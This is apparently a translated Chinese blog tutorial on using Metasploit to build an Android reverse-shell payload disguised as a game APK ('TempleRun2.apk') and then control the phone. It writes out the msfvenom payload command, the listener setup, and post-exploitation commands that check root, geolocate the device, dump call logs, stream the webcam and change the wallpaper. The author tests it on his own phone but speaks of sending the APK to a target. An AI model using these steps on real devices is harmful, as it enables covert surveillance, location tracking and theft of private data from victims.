最新消息:

使用Metasploit实现对Android的远程管理

原创翻译 Eternal 3104浏览 0评论

话不多说,我们直接切入正题。

1.首先我们打开Kali的命令终端,输入如下命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444

>/root/Desktop/TempleRun2.apk

我们可以看到在桌面生成了一个.APK的文件。

2016041206541299

2.将生成的APK文件发送给目标手机。在此以我自己的手机为例,我将文件下载并安装到了自己手机上。下面我们在Kali上建立一个监听和处理反弹shell的程序。首先输入:msfconsole 启动MSF。以下依次输入如下命令:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.102

set lport 4444

exploit

2016041206595742

到这步我已经成功取得了我的Android手机的控制权。让我们在Kali上执行一些命令看看是否有效。我们查看下该手机是否已经取得root 权限。输入命令:

check_root

2016041207023174

查下手机目前所处的大概位置:

wlan_geolocate

2016041207042683

通过以上结果提供的URL,我们可以使用谷歌地图进行定位。将URL复制到浏览器打开。

2016041207061420

下载目标手机上的通话记录:

dump_calllog

2016041207075912

默认保存在了?/root/calllog_dump.txt

2016041207090425

打开摄像头实时画面:

webcam_stream

2016041207113521

在浏览器查看。

2016041207124998

来个比较有意思的。现在让我远程强制修改我手机的壁图案。继续输入命令如下:

msf > use post/multi/manage/set_wallpaper

msf post?(set_wallpaper)>set WALLPAPER_FILE? /root/Desktop/hack.jpg

msf post?(set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

2016041207200477

成功替换!

本文由 即刻安全 翻译编辑,转载请注明来源!

转载请注明:即刻安全 » 使用Metasploit实现对Android的远程管理

您必须 登录 才能发表评论!



合作伙伴